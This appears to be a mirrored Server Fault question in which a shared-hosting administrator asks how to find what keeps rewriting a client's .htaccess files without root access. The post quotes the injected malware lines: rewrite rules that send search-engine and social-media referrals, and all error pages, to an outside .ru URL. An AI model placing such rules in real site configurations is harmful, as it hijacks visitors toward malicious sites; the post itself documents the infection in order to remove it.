shared hosting with malware, .htaccess file gets modified every 2 hours or so

Posted by apache on Server Fault See other posts from Server Fault or by apache
Published on 2012-06-07T22:36:31Z Indexed on 2012/06/07 22:42 UTC
Read the original article Hit count: 260

Filed under:

I spent all day today chasing malware on the shared hosting for one of my clients.

The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added:

IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>

and on the bottom:

ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root.

I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control.

This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/

How do I find out who is modifying .htaccess files without being root?

© Server Fault or respective owner

Related posts about apache2